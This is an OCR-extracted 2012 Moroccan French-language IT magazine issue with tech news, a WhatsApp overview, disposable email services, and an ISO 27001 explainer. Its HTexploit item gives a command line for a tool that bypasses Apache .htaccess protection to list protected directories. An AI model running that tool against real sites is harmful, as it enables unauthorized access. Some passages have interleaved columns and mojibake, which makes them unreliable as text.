Enrich your knowledge
Première revue en informatique au Maroc
Tera-magazine N° 04 | 20 Septembre 2012
Dossier
La norme ISO 27001
Hacking des mots de passe suite.. P35
P15
DÉCOUVERTE DU POWERSHELL P29
HOW TO? ACTIVATION DES APPELS PAR
MODEM 3G
P41
&LE&MÉTIER DE L’AVENIR : Administrateur des systèmes P49
Hack your Android Phone. P55
WHATSAPP INWI & GMAIL P17
رمز االستجابة السريع P54 أو الرمز المربع
TERA-MAGAZINE
Dossier du Mois
Som mair e
J
La norme ISO 27001
15-28 L’actualité informatique
5-7
Tera-Discovery
8-14
µwhatsapp,INWI & Gmail, htexploit, Email temporaires
PowerShell Le nouveau shell de windows
Tera-Labos Activation des appels par un modem 3G.
Le métier d’administrateur système
Tera-Topics
رمز االستجابة السريع أو الرمز المربع Hack your Hcking your phone Android Phone.
29-34 41-48 49-52 57-59
UNE REVUE FAITES PAR DES INFORMATICIENS POUR DES INFORMATICIENS Tera-bit-magazine Première revue en informatique au Maroc 20012. www.teramagazine.tk tera.revue@gmail.com 2
INTRO* EMAIL: tera.revue@gmail.com
T
Website: www.Teramagazine.tk
era-magazine est la première revue numérique, mensuelle qui s’adresse aux passionnés du monde informatique au Maroc. Il s’agit d’une initiative bénévole pour créer un moyen de partage des connaissances et des expériences entre informaticiens.
L’informatique étant un domaine très vague nous essayons selon les compétences disponibles, à travers ces pages, de couvrir les différents sujets qui peuvent intéresser les informaticiens au Maroc et les approchez des différentes zones qu’ils n’ont pas eu le temps de les découvrir ou leurs formations n’incluent pas. Loin des slogans de marketing ou des pubs, nous vous assurons que nous tendons nos mains vers vous pour collaborer et allez en avant pour mettre en disposition du lecteur un produit de qualité. Alors, n’hésitez surtout pas, chers lecteurs à nous contacter pour vous exprimer. Enfin, nous comptons bien sûr votre réactivité pour améliorer le contenu offert.
L’équipe de rédaction
Magazine contact magazine team Saber Hanor BELLAJ BADR SOULAMI RABIE ANSAR ASMAE Mustapha daoui IMADE Ranji Nahass Touria ILYAS BAGUI
Contact Mail : tera.revue@gmail.com Facebook :facebook.com/tera.revue Twitter :@terarevue
MAGAZINE DESIGNER: Jaffar ikhessa.
>>FAITES NOUS SAVOIR CE QUE VOUS VOULEZ DANS NOTRE PROCHAIN NUMÉRO. 3
Les éditions Précédentes
L’actualité Informatique
4
4
what’s New?
ue q i at m or f n I
REVIEWS
t c a L’
Chrome 22 Disponible en téléchargement : www.google.com/chrome
hrome a notamment été cification d’affichage 3D), Web amélioré pour prendre Audio (spatialisation du son), en charge les applicaWebSockets (transaction biditions de jeu en ligne. rectionnelle et full-duplex sur Cette vingt-deuxième version un socket TCP)... Enfin, dans la introduit notamment l’API même logique, Google indique JavaScript avoir amélioré “85% des utilisateurs le rendu de son Pointer Lock qui permet de navigateur pour de Google Chrome mieux gérer Windows 8 et les les contrôles à ont déjà installé la écrans Retina. la souris. Pour Google, le navi- nouvelle version” gateur apporte désormais toute la panoplie de standards adaptés à ce type de projet : WebGL (spé-
C
>>Chrome 23 Chrome 23 s’attaque à la vidéo Profitant de nouvelles API et du HTML5, le prochain navigateur Google offrira des fonctions inédites liées à la vidéo. Le tout sans le moindre plug-in à installer comme le montre la première bêta de Chrome 23.
UBUNTU Champ de recherche
Si vous êtes contre cet ad-aware, passez au MINT. Il est aussi bien que Ubuntu. 5
Canonical a décidé d’intégrer des liens publicitaires vers Amazon dans la prochaine version de sa distribution Linux Ubuntu 12.10, sous une forme relativement discrète. Lorsque l’utilisateur saisira des termes de recherche dans le champ de recherche unifiée de l’interface Ubuntu Unity, des liens vers Amazon pourront apparaître si des produits correspondent chez le géant de l’ecommerce, parconsequent lorsqu’un utilisateur lance une recherche ordinaire d’un fichier ou d’une application sur son bureau, des liens Amazon vers des articles rattachés aux mot-clés saisis apparaissent avec les résultats du Launchpad.
é t i l tua
6
Google DOCS
REVIEWS
what’s New?
Google Docs : fin de l’export de documents .doc .xls et .ppt.
Google Docs
“Vos docuGoogle ne permettra plus d’exporter des documents aux « anciens » formats que sont .doc, .xls, et .ppt. pour les version de Microsoft Office (antérieures à 2007). Cependant, google docs assure toujour l’upload des ces formats et leurs modification. Un changement qui prendra effet dès le 1er octobre.
ments google Les formats supportés
Docs sont disponible automatiquement dans votre google Drive”
Facebook et twitter On compte désormais un milliard d’utilisateurs sur Facebook en septembre 2012 et un demi-milliard utilisateurs de twitter. En fin de cette revue nous publions des statistiques sur l’utilisation de facebook et twitter au monde arabe.
Deux pays sans frontières
L
a comparaison entre le nombre des utilisateurs de facebook et twitter avec les populations des grands pays met ces deux géants en position d’avance parmi les populations mondiales. Le classement est : 1-La Chine 2-l’Inde 3-facebook 4-USA 5-Indonesia 6-Brésil 7-Twitter
“de retour cette fois c’est Meg-
abox!!”
Meqaupload Kim Dotcom le fondateur du Megaupload, a annoncé que MegaUpload est de retour sous une nouvelle forme qui est prête à 90%.avec de nombreuses fonctions additionnelles, le partage, la notation, les commentaires, des infos sur l’artiste, etc. Espérons que ce service apportera quelque chose d’innovant, puisque des offres quasi similaires existent déjà. A moins que l’innovation soit… la gratuité ?
www.Teramagazine.tk
2012
>> En Chiffres
6
L’actualité
Tera-Magazine
what’s New?
REVIEWS
Lancement du portail d’obtention de la carte d’identité national CIN.
B
Lent augait aute minisim
onne nouvelle pour les citoyens marocains qui désirent obtenir ou renouveler leurs cartes d’identité nationale : le gouvernement marocain a lancé en ligne le portail : http://www.cnie.ma pour connaître la procédure d’obtention ou du renouvellement de la carte CIN, ainsi que suivre l’état de sa demande. Cette bonne initiative s’inscrit dans les efforts de l’état pour moderniser les services administratifs et s’approcher du citoyen par le biais des nouvelles technologies.
Encore une faille critique de securité!!
C
e mois a connu la découverte d’Une faille critique de plus. La vulnérabilité qui touche la version 1.7.x du JRE (Java Runtime Environment), peut être utilisée pour désactiver le SecurityManager et par conséquent le sandbox de Java pour exécuter du code arbitraire sur les systèmes vulnérables sans l’intervention de l’utilisateur. Nous vous conseillons de faire une mise à jour de votre machine virtuelle. Allez dans votre panneau de configuration sous Windows et choisissez Java ensuite faites votre update.
Yeti Testez votre code Javascript
Y
eti est un outil de ligne de commande pour lancer les tests unitaires JavaScript dans un navigateur et communiquer les résultats sans quitter votre terminal. Il a été conçu pour fonctionner avec des tests basés sur YUI Test. Homepage: http://yeti.cx/ GutHub:https://github.com/pankajparashar/yeti
7
what’s New? Le Navigateur sécurisé “Browser in the Box”
8
REVIEWS
est désormais disponible
L
Sur la base d’un “Navigateur-in-the-Box” qui est un concept qui se base sur une machine virtuelle munie d’un système d’exploitation réduit et un navigateur encapsulé. Bitbox est robuste face auxMalwares qui ne peuvent pas donc pénétrer dans le système d’exploitation hôte. Les dommages potentiels dans la machine virtuelle séparée disparaîtront avec chaque démarrage du navigateur en revenant à un point de départ certifié. Tout cela est totalement transparent pour l’utilisateur pour une meilleure protection contre les logiciels malveillants et les fuites de données. Contrairement aux méthodes de sandbox simples fournis par les navigateurs standard, “Bitbox” isole toutes les activités du navigateur complètement du système d’exploitation hôte. Seulement un seul dossier partagé au sein de l’hôte est rendu accessible à un compte utilisateur séparé. Ce dossier stocke toutes
GRATUITEMENT les données de configuration persistants comme les favoris du navigateur. Ensuite, tous les fichiers téléchargés sont d’abord stockés dans ce dossier et ils ne sont pas transmis dans le dossier de téléchargement de l’utilisateur et ceci après un scan contre les ‘malwares’.
En outre, “Bitbox” assure une protection en profondeur du système de l’hôte contre les attaques provenant d’Internet, vu qu’il empêche de façon fiable les transferts de fichiers vers Internet. Ainsi, la confidentialité des informations critiques de l’entreprise ou l’autorité n’est pas mise en péril par la simple fourniture d’accès Internet à ses employés. “Browser in the Box” propose ainsi, un environnement de surf sécurisé et sans soucis, sans aucune limitation dans le confort. L’utilisation coûteuse et complexe de serveurs de terminaux dédiés comme une alternative sûre pour le surf peut être évité. L’impact sur les performances est minime pour les architectures informatiques d’aujourd’hui. Pour télécharger visiter BitBox: http://download.sirrix.com/content/pages/ bbdl-en.htm
www.Teramagazine.tk
2012
’environnement virtuel “Browser in the Box”(BitBox) a été initialement développé par Sirrix pour le compte de l’Office fédéral allemand pour la sécurité de l’information pour une utilisation par toutes les autorités fédérales. Désormais, la solution est disponible gratuitement, pour permettre aux utilisateurs de surfer sur Internet en toute confiance, même en utilisant les technologies Web les plus modernes et les plus vulnérables.
8
Tera-Magazine
Mail Box
Input
TERA-MAGAZINE
INBOX Septembre 7 OPEN ERP Je veux débuter en ERP. Par où dois-je commencer? Commencez par un des tutoriels sur youtube. Je vous conseille OpenERP qui est bien documenté ou openBravo comme début. septembre 12TH Raspbery Pi Pourriez-vous me dire où puis-je trouver un raspbery Pi au Maroc? Je pense qu’il n’existe pas de point de vente de raspbery Pi au Maroc, si vous en trouvez-un, faites nous le savoir.
et téléchargez la dernière ROM disponible. Septembre 5H NGINX J’entends parler beaucoup de NGINX pourquoi l’utiliser et est ce qu’il est utilisé au Maroc?
Comme vous le savez il existe un ensemble de serveurs dont le dominant étais apache, mais actuellement NGINX gagne du terrain Septembre 7 rapidement et il est Archos devenu très popuJ’ai une tablette Archos laire vue ses perV2 puis-je la rooter et y formances surtout installer une ROM? face à la montée en charge et sa rapidité. Pour les hébérgeurs marocains il faut contacter leurs services techniques pour savoir quels serveurs il utilisent selon mes informations, apache est le Oui, bien sur. choix régnant chez Consultez le site du eux. constructeur Archos 9
Septembre 2012
Important
Nous présentons nous excuses pour l’absence durant le mois août, vu que la majorité de l’équipe étais en vacances. Nous reprenons notre activité avec plein d’enthousiasme et de joie pour vos offrir notre meilleur. Nous revenons dans ce ‘Inbox’ aux messages reçus durant la période de notre inactivité. Nous présentons quelques exemples reçus. Un dernier mot; Cette revue n’est pas un travail de journalistes ou de presse, mais un travail d’informaticiens destiné à des informaticiens.
Septembre 19TH Freelance Je suis un webDesigner, je vous demande de consacrer des articles au Freelance au Maroc. le freelance au Maroc est un domaine peu exploré. Nous comptons y consacrer un dossier dans nos prochaines éditions.
Special
S
i vous avez des demandes des conseils ou des articles envoyez nous un E-mail à : tera.revue@gmail. com
ous remercions nos lecteurs à l’étranger spécialement au canada, en Tunisie et en Algérie pour leur soutien et leurs encouragements. Bienvenue parmi la communauté Tera.
N
10
Tera Découverte
www.Teramagazine.tk
2012
Des services et des nouveautés à découvrir
10
Tera-discovery
WHAT S APP D
e Depuis que l’internet et les téléphones intelligents ont commencé à envahir nos vies, de nouvelles formes de communication ont surgi : Facebook, Twitter, Gmail ... Désormais, un nouveau né s’ajoute à cette liste, il connaît un grand succès étroitement liée à votre activité mobile : Il s’agit du Whatsapp. Whatsapp est un moyen qui vous permet de rester en contact avec vos amis partout dans le monde à l’aide d’un échange des messages SMS en illimité sans avoir un forfait ou recharge mobile.
Note:
L’utilisation reste gratuite pour la Première année.
Note:
prix : 0.99 $ /an
12
Comment utiliser WhatsAPP? L’utilisation de WhatApp est facile. Il suffit d’installer la version adéquat disponible sur le site officiel (http://www. whatsapp.com), selon votre mobile. Lancer l’application et chercher vos amis qui ont un compte whatsapp sur votre liste de contacts, c’est tout!
Pourquoi utiliser WhatsApp? Il existe un ensemble d’avantages en utilisant WhatsApp dont on cite : • L’envoie des fichiers multimédias: Vidéo, des Images, et des notes vocales à vos amis et contacts. • Création des groupes de chat: Profitez des conversations de groupe avec vos contacts. • Utilisation sans codes Pins ou nom d’utilisateurs: WhatsApp fonctionne juste avec votre numéro de téléphone et s’intègre parfaitement avec votre annuaire d’adresses existant. • Utilisation sans Login/Logout: Avec les notifications, WhatsApp est toujours allumé et connecté en permanence. • WhatsApp enregistre vos messages hors ligne jusqu’à ce que vous les récupérer lors de l’utilisation prochaine application. WhatsApp est devenu outrageusement populaire en raison de son système de SMS gratuit sur Internet. Essayez-le.
www.Teramagazine.tk
2012
w
hatsApp Messenger est une multi-plateforme de messagerie disponible pour iPhone, BlackBerry, Android, Windows Phone, Nokia et autre. WhatsApp Messenger utilise le même plan de données Internet que vous utilisez pour le courrier électronique et la navigation sur le Web, il utilise votre connexion 3G ou WiFi (si disponible) pour échanger vos SMS avec des amis et la famille. Passez du SMS à WhatsApp pour envoyer et recevoir des messages, des photos, des notes audios, et des messages vidéos, en plus de la messagerie de base.
12
Tera-Magazine
Inwi & Gmail
INWI & GMAIL
restez connectés & chatez en SMS
L
e service Gmail-SMS vous permet d’envoyer gratuitement jusqu’à 50 SMS à partir de votre compte Gmail vers les numéros mobiles inwi. Votre contact peut vous répondre par SMS directement sur votre compte Gmail, en vous donnant la possibilité d’initier une conversation CHAT. Chaque réponse de votre contact vous fera gagner jusqu’à 5 SMS supplémentaires gratuits à envoyer depuis votre compte Gmail. Vous pouvez cumuler jusqu’à 50 SMS maximum sur votre compte.
How To DO
1
Saisissez le nom Tip! de votre contact dans le champ de recherche ou invitez votre ami à participer à un chat, puis sélectionnez Envoyer un SMS dans le menu qui s’affiche à droite du nom du contact. Si vous avez déjà ouvert une session de chat avec ce contact, cliquez simplement sur Options, puis sélectionnez; Envoyez un SMS (Fig1).
2
Dans la boîte de dialogue, saisissez un numéro de téléphone dans le champ “Envoyer des SMS à ce numéro”. Pour le moment, cette fonctionnalité est proposée uniquement pour INWI. (Fig2)
3
Cliquez sur Enregistrer.
4
Une fenêtre de chat s’affiche. Saisissez votre message comme à votre habitude. Appuyez sur Entrée pour envoyer le message au numéro de téléphone indiqué.
Fig.2 information
Fig.1
Combien ça coûte ?
Les SMS envoyés du mobile vers le compte Gmail sont facturés au prix standard (1DH / SMS) Sur le lien http://support.google.com/chat//bin/answer.y?hl=fr&answer=16 4876&rd=1 Google indique que INWI est l’opérateur unique qui bénéficie de ce service, en attendant que les deux autres font de même. 13
Selon le forfait mobile dont vos contacts disposent, des frais d’opérateurs peuvent leur être imputés pour la réception de SMS.
Samsung Galaxy SIII Vous l’aurez un jour !!
Caméra Caméra orientée vers l’avant Note
LED lumineux
Caméra • 8 Mega pixels Note
OS • Android 4.0(ICS)
Boutton d’acueil
Ecran • 4.8’’,1280x720 pixels, 16M Couleurs. • HD Super Amoled
Note
70.6mm >>Offres Samsung S3 Chez Meditel : Engagement 24 mois • Offre Smartphones 2h30:3990Dh • Offre Smartphones 4h30 : 2990 Dh
Chez IAM IAM Pack GSM : • 12 mois : 6549 (DH TTC) • 24 mois (Particuliers): 5949 (DH TTC)
Caractéristiques: • Dimensions : 136.6x70.6x8.6 mm • Poids : 133 g • Autonomie : 900h(2G)/750h(3G) en mode veille et 1300min(2G)/650min(3G) en communication • Bi-bande Tri-bande • Batterie : Standard, Li-Ion 2 100 mAh • processeur : Quad-Core de 1.4GHz
14
Tera-Magazine
Discovery
Tera
E-MAILS
TEMPORAIRES Par Imad belhadi
Votre Arme contre les SPAMS PLus besoin de créer de nouvelles boites Mails
v
ous voulez s’inscrire dans un nouveau site ou un service qui demande votre mail et vous craignez que cette inscription vous causera un flux de SPAM (mail indésirable) alors la solution est les mails temporaires ou jetables. Comme leurs noms l’indiquent ces Emails sont pour une utilisation de courte durée. Les messages s’auto-détruisent au bout de quelques minutes ou jours, ou après la durée que vous avez précisée à la création de votre compte temporaire (de quelques heures à quelques mois).
Le plus important dans ces E-mails, c’est qu’ils ne demandent aucune inscription. Vous inventez le nom d’utilisateur et hop! vous possédez une boite mail par exemple je vous donne “quelquechose_ teramag@yopmail.com” pour m’envoyer un Email, Je n’ai pas besoin de créer ce compte chez yopmail mais j’accède directement en fournissant seulement le préfixe “quelquechose_teramag”. Pour limiter l’accès à ce compte mai , pour qu’il ne soit accessible que par vous même utilisez un nom très difficile à retenir sinon take it easy.
Fournisseurs des mails-temporaires Voici donc une liste de sites qui proposent ce service, ce sont tout simplement les plus fiables et les plus connus ... • Jetable.org • Yopmail.com • mytrashmail.com • Brefmail.com • Mail-Temporaire.com • LinkToMail.net • www.0-Mail.com • anonymbox.com 15
la protection par .htaccess EST ELLE VULNÉRABLE?
D
eux chercheurs en sécurité ont présenté à l’occasion de la conférence Black Hat de Las Vegas un outil nommé HTexploit destiné à contourner la protection .htaccess des serveurs web Apache. la nouvelle a de quoi alerter vos services de veille : il est en effet très probable qu’un grand nombre de vos interfaces d’administration soient protégées par htaccess (sites web, systèmes de publication, équipements réseau dotés d’une interface web, etc…). Cependant, nous observons que HTexploit n’est pas encore optimisé au point d’en faire un outil de piratage clés-en-main (ce que les auteurs précisent d’ailleurs sans honte). Si vous parvenez à le faire fonctionner, et contourner ainsi la protection .htaccess d’un répertoire afin d’en extraire du contenu, n’hésitez pas à nous contacter !
>>HTexploit: HTExploit est un outil open-source écrit en Python qui exploite une faiblesse dans la façon dont le fichiers .Htaccess peut être configuré pour protéger un répertoire web avec un processus d’authentification. cet
outil serait donc capable de lister le contenu d’un répertoire protégé de cette façon, sans passer par le processus d’authentification.
L’utilisation de HTexploit: L’utilisation est simple il suffit de Télécharger Htexploit et le décompresser, ensuite taper :
sudo ‘chemin du fichier’ -u ‘adresse web à tester’ et lancer votre test. En résultat, HTexploit affirme ou non si le dossier web est vulnérable, mais ne croyez pas toujours ses conclusions.
.htaccess c’est quoi? Les fichiers .htaccess sont des fichiers de configuration d’Apache, permettant de définir des règles dans un répertoire et dans tous ses sous-répertoires (qui n’ont pas de tel fichier à l’intérieur). On peut les utiliser pour protéger un répertoire par mot de passe, ou pour changer le nom ou l’extension de la page index, ou encore pour interdire l’accès au répertoire. Intérêt des fichiers htaccess. Les fichiers .htaccess peuvent être utilisés dans n’importe quel répertoire virtuel ou sousrépertoire.
Les principales raisons d’utilisation des fichiers .htaccess sont : • Gérer l’accès à certains fichiers. • Ajouter un mime-type. • Protéger l’accès à un répertoire par un mot de passe. • Protéger l’accès à un fichier par un mot de passe. • Définir des pages d’erreurs personnalisées.
www.Teramagazine.tk
2012
s
16
16
Tera-Magazine
Dossier
Tera
ISO 27001 Un label de qualité ou une protection de votre système d’information ?
ISO 27001 Présentation Méthode d’implémentation Audit ... 15
Lest’s Talk About
Dan prése son i comp au M assez
16 Tera
Dossier
ISO 27001 une norme pour la sécurité de l’information
ns une première, Au Maroc, nous vous entons la norme ISO 270001. Conscient de importance nous vous proposons un dossier plet pour étudier cette Norme peu connu Maroc et dont la documentation gratuite est z rare.
est encore peu de temps, le Maroc était l’un des cancres de la norme ISO 27001. Il faut dire que l’idée d’un cadre de gestion de la sécurité, avec tout le formalisme que cela implique, ne passionne pas forcément les acteurs marocains dans le domaine des SI. ISO 27001 est une nouvelle norme pour mettre en place un système de management de la sécurité de l’information. Cette norme ISO 27001 et ses cousines (27002 et 27005) ont depuis leurs apparitions gagné du terrain et de la reconnaissance. En rai-
IL
son de leurs qualités et leurs performances. Encore une norme, vous me direz! Hé oui, on n’arrête pas le progrès. Vous avez déjà eu un problème informatique, la perte de données due à la défaillance de votre disque dur ou des intrusions à votre système d’information ? À mon avis, toutes les organisations ont déjà subi de tels inconvénients. En outre, presque tout dans le mode des affaires d’aujourd’hui est basé sur l’information. Avoir des informations correctes au bon moment est souvent la source d’avantage
16
Tera-Magazine
Dossier
Tera
concurrentiel. Par conséquent, Les entreprises dépensent une grande partie de leurs budgets à l’acquisition de l’information et de gestion. Nous pouvons dire que l’information est le plus précieux “actif” qu’une entreprise peut avoir aujourd’hui. Dans le cas où vous souhaitez gérer et atténuer les risques liés au travail avec vos informations et vos données, vous avez de nombreuses options. Une des options consiste à mettre en œuvre un système pour la gestion de la sécurité des informations, soi-disant sécurité de l’information de gestion du système (SMSI). Une fois les processus sont en place, vous pouvez avoir votre système de gestion de sécurité de l’information et de vos processus certifiés. La norme ISO 27001 vise donc la mise en place d’un système pour réduire vos risques à cet égard. Avoir une information certifiée ISO 27001 Système de gestion de la sécurité vous donne un grand avantage dans le traitement de vos clients et partenaires, car il vous rend plus crédible et digne de confiance. Cela peut ouvrir la porte pour échange mutuel de
17
données et l’échange d’informations avec vos clients, partenaires, fournisseurs. ISO 27001 est à la fois un label de qualité et une protection de votre système d’information. L’étude de cette norme demande des efforts et de la bonne documentation et surtout de bonnes connaissances dans le domaine informatique. à travers ce dossier, je vais essayer d’introduire cette norme et de couvrir ses aspects importants (les avantages, limites ...).
Point de Départ : Avant d’entamer notre parcours, il faut avoir des connaissances dans le domaine informatique et surtout en sécurité informatique. Il faut connaitre un ensemble de définitions telles que : menace, risque et vulnérabilité qui sont des notions de base. Académiquement on peut les définir comme suit : • Menace : Une attaque possible d’un individu ou d’un élément naturel sur des biens (ici, des informations) entraînant des conséquences potentielles négatives.
• Vulnérabilité : Caractéristique d’une entité qui peut constituer une faiblesse ou une faille au regard de la sécurité de l’information. • Risque : Combinaison d’une menace et des pertes qu’elle peut engendrer. On aura aussi besoin de définir qu’est-ce que c’est un système de management et un SMSI.
ISO 27001 est à la fois un label de qualité et une protection de votre système d’information.
Les systèmes de management Définit par l’organisation internationale de normalisation ISO dans la norme IS0 9000 et plus précisément dans la rubrique intitulée « Système de management », comme un système permettant : • D’établir une politique. • D’établir des objectifs. • D’atteindre ces objectifs. Plus concrètement, un système de management peut être vu comme un ensemble de mesures techniques et organisationnelles visant un objectif.
SMSI
la norme ISO
27001
La
norme ISO/IEC 27001:2005 est une norme internationale de système de gestion de la sécurité de l’information. Elle a été publiée en 2005 par l’ISO sous le titre : Technologies de l’information - Techniques de sécurité - Systèmes de gestion de sécurité de l’information Exigences. L’ISO 27001 régit la conception, la mise en œuvre, le suivi, la maintenance, l’amélioration et la certification du système de management de la sécurité de l’information (SMSI). Il ne prescrit pas les contrôles spécifiques de sécurité des informations, mais s’arrête au niveau du système de gestion. ISO 27001 n’est pas une loi impérative, il est plus d’une collection de «meilleures pratiques» et «connaissance pratique éprouvée de l’industrie» liés à ISMS. ISO 27001 est la norme officielle avec laquelle les organisations peuvent demander une certification indépendante de leur (SMSI).
18
à qui s’adresse cette norme?
La norme couvre tous les types d’organisation (à l’occurrence, des entreprise commerciales, des organismes gouvernementaux et organismes sans but lucratif) ainsi que toutes tailles (PME/PMI) à partir des micros-entreprises aux grandes multinationales. Selon JTC1/SC27, le responsable de l’ISO / CEI comité pour ISO27000 et les normes connexes , la norme ISO / CEI 27001 est destiné à être adapté à différents types d’utilisation, y compris: • Utilisation au sein des organisations à formuler des exigences de sécurité et les objectifs. • Utilisation au sein des organisations comme un moyen de s’assurer que les risques de sécurité ont des coûts gérés efficacement.
Un SMSI est un exemple de système de management. En se basant sur la définition du système de management, un SMSI peut se définir par un ensemble des ressources en matière de la sécurité de l’information permettant à une organisation d’établir une politique et des objectifs, ainsi d’appliquer cette politique et atteindre les objectifs et une fois ces objectifs sont atteints, il faut les contrôler et les superviser.
Principaux systèmes de management Les systèmes de management s’appliquent non seulement au domaine de la sécurité de l’information, mais aussi leur implémentation s’effectue dans plusieurs domaines tels que la qualité, l’Environnement, les services informatiques, la sécurité alimentaire ou encore celui de la santé. A chaque domaine correspond un référentiel précis qui est normalisé par l’ISO (Organisation internationale de normalisation).La normalisation des référentiels n’est pas restreinte à l’organisation internationale de normalisation ISO. Le tableau ci-dessous résume les principaux systèmes de management et leurs référentiels :
Référentiel
SMSI
ISO 9001
Qualité
ISO 14001
Environnement
ISO 27001
Sécur ité de l’information
ISO 20000
Services informatiques
OHSAS 18001 Santé /Sé curité du personnel ISO 22000 Sécurité alimentaire 18
Dossier
Tera-Magazine
Tera
• Utilisation au sein des organisations afin d’assurer la conformité aux lois et règlements; • Utilisation sein d’une organisation comme un cadre de processus pour la mise en œuvre et la gestion des contrôles pour s’assurer que les objectifs de sécurité spécifiques d’une organisation sont respectées;
structure et contenu de la norme ISO/IEC 27001 La norme 27001 comporte 9 chapitres dont 5 (les chapitres 4 à 8) doivent obligatoirement être respectés pour répondre à cette norme et obtenir une certification. Le chapitre 4 est au cœur de la norme et il est divisé en plusieurs parties correspondant aux 4 phases du PDCA. Il détermine la mise en place du SMSI, son implémentation et son exploitation, le contrôle du SMSI et son amélioration. Ci-dessous la présentation des neufs chapitres de l’ISO / IEC 27001:2005 :
Introduction - la norme utilise une approche par processus.
1- Domaine d’application : il spécifie les exigences génériques appropriées pour les ISMSI des organisations de tout type, taille ou nature.
4- Le SMSI : son fonctionnement
est basé sur un modèle cyclique en 4 étapes appelé « PDCA » c’est-à-dire Plan (planifier), Do (développer), Check (contrôler ou vérifier), Act (a juster).
5- Les engagements et responsabilités de la direction : la direction doit démontrer leur engagement à l’ISMS, principalement par l’allocation de ressources suffisantes pour mettre en œuvre et exploiter elle.
6- Audits internes du SMSI : l’organisme doit effectuer périodiquement des audits internes afin d’assurer que le SMSI intègre des contrôles adéquats qui fonctionnent de manière efficace. 7- Réexamen du SMSI par la direction : la direction doit examiner la pertinence, l’adéquation et l’efficacité du SMSI au moins une fois par an, en évaluant les possibilités d’amélioration et de la nécessité de changements. 8- Améliorations du SMSI : l’organisme doit améliorer en permanence le SMSI en évaluant et le cas échéant d’apporter des modifications afin d’assurer sa pertinence et l’efficacité, la non-conformité face (non-) et, si possible la prévention des problèmes récurrents.
Annexe A : Les objectifs de contrôle et les contrôles - un peu plus en fait ment la norme ISO / IEC 27002:2005 que la liste des titres des sections de qui est considérée comme absolument contrôle de la norme ISO / CEI 27002, essentielle à l’utilisation de l’ISO 27001. vers le bas pour le deuxième niveau de la numérotation (par exemple 9.1, 9.2), 3- Termes et définitions : un bref 133 au total. glossaire formalisée, qui sera bientôt remplacée par la norme ISO / CEI 27000. Annexe B : Principes de l’OCDE et de la présente Norme internationale - une
2- Références normatives : seule-
19
20
table brièvement montrant quelles parties de cette norme satisfaient aux 7 principes clés énoncés dans les lignes directrices de l’OCDE régissant la sécurité des systèmes et réseaux d’information.
Annexe C : Correspondance entre
l’ISO 9001:2000, ISO 14001:2004 et la présente Norme internationale - le standard partage la même structure de base des autres standards de systèmes de gestion, ce qui signifie qu’une organisation qui veut mettre en œuvre n’importe quel standard doit être familiarisée avec des concepts tels que PDCA, dossiers et audit.
Les avantages de L’ISO 27001 Cette norme présente de nombreux avantages : • Une description pratique et détaillée de la mise en œuvre des objectifs et mesures de sécurité. • Un audit régulier qui permet le suivi entre les risques initialement identifiés, les mesures prises et les risques nouveaux ou mis à jour, afin de mesurer l’efficacité des mesures prises. • Processus d’amélioration continue de la sécurité, donc le niveau de sécurité a plutôt tendance à croître. • Meilleure maîtrise des risques •Diminution de l’usage des mesures de sécurité qui ne servent pas. • Une certification qui améliore la confiance avec les parties prenantes. • Homogénéisation : c’est un référentiel international. Cela facilite les échanges,surtout pour les entreprises qui possèdent plusieurs sites. • Processus simple et peu coûteux : réduction des coûts grâce à la diminu-
tion d’usage de mesures de sécurité inutiles et à la mutualisation des audits (baisse du nombre et de la durée des audits quand on obtient la certification). • La norme fournit des indicateurs clairs et fiables ainsi que des éléments de pilotage financier aux directions générales. • La norme permet d’identifier plus efficacement les risques et les coûts associés.
Les Limites Comme toute norme l’ISO 27001 a ses limites d’application : • Faible expérience des organismes d’accréditation par rapport aux spécificités des enjeux en sécurité des systèmes d’information. • Relations commerciales prépondérantes (achat de certification, de conseil, de produits, de services), ce qui conduit à une dévalorisation du processus d’accréditation. • La durée des audits est courte. • Mélange des genres : les sociétés de conseil sont également des organismes de certification et vis-versa. • La définition et la mise en place d’une méthodologie sont des tâches lourdes. • Les normes informatiques ne réduisent pas le risque en matière de piratage et de vols d’informations confidentielles. • Les intervenants effectuant du piratage ne respectent pas les règles établies et cherchent systématiquement à les contourner • Les normes sont inopérantes dans ce domaine.
20
Dossier
Tera
La mise en place du SMSI Dans cette partie, on va mettre en relief les étapes à suivre pour la mise en place d’un SMSI, les principales difficultés rencontrées ainsi que les pièges à éviter.
Les intervenants Le chef de projet de SMSI doit remplir certains critères à l’occurrence : • Comprendre les points incontournables pour la mise en place d’un système de management • Etre en mesure de trancher les questions relatives à la sécurité • Avoir reçu une formation certifiante ( la formation implémentation iso 27001 et la formation iso 27001 Lead Auditor) Il faut noter que ces formations sont des critères nécessaires et non suffisants. Le déploiement du projet SMSI exige à son chef de communiquer avec trois catégories de ressources humaines à savoir : • La direction générale : le chef de projet se charge d’évaluer, avec précision, les coûts humains et financiers de chaque aspect du projet comme il doit savoir tirer et présenter les apports du SMSI. • Les techniciens : le chef de projet doit avoir un background technique assez fort afin de pouvoir communiquer avec les techniciens comme il doit mettre en exergue la contribution des techniciens dans la mise en œuvre de SMSI. • Les utilisateurs : le chef de projet doit sensibiliser cette population des apports de SMSI ainsi de l’amélioration continue obtenue.
21
Tera-Magazine
Les méthodes de mise en place du SMSI D’après ALEXANDRE FERNANDEZ –TORO, dans son ouvrage « Management de la sécurité de l’information », Il ‘y a plusieurs approches pour aborder le projet SMSI, nous allons étudier deux méthodes :
L’approche séquentielle : consiste à suivre de façon séquentielle les exigences de la norme dans leur ordre affiché. Or, cette démarche s’avère dangereuse car elle ne prend pas en considération plusieurs facteurs à savoir : • La réalité du terrain : la fixation du périmètre et la politique au début n’est • pas toujours une bonne idée. • Les mesures déjà existantes . • Certaines taches manquantes : la norme n’étant pas un « document projet ». • La nécessité de paralléliser les tâches : la norme iso 27001 présentes les exigences de façon séquentielles sans préciser quelles taches doivent être conduite en parallèle L’approche projet : consiste à prendre toutes les libertés nécessaires pour garantir le succès du projet. A condition que le SMSI doit remplir les trois contraintes suivantes : 1. Exigence de la norme 2. Modèle PDCA 3. Cohérence générale Dans la suite on va détailler les étapes de chaque approche
22
L’approche projet : Dans l’optique de cette approche la mise en place du SMSI se fait en quatre Êtapes :
Phase 1 : analyse prĂŠalable.
Dans cette phase, on commence par une Êtude d’opportunitÊ, suivi par un Êtat de lieux et s’achève par la sÊlec- tion d’un scÊnario de dÊploiement
